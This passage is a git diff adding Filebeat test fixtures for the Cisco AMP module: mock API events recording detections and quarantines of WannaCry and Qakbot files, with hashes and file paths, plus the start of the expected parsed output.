+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline 
at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
new file mode 100644
index 00000000000..7f5499ebf3c
--- /dev/null
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
@@ -0,0 +1,3734 @@ +[ + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 96000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + 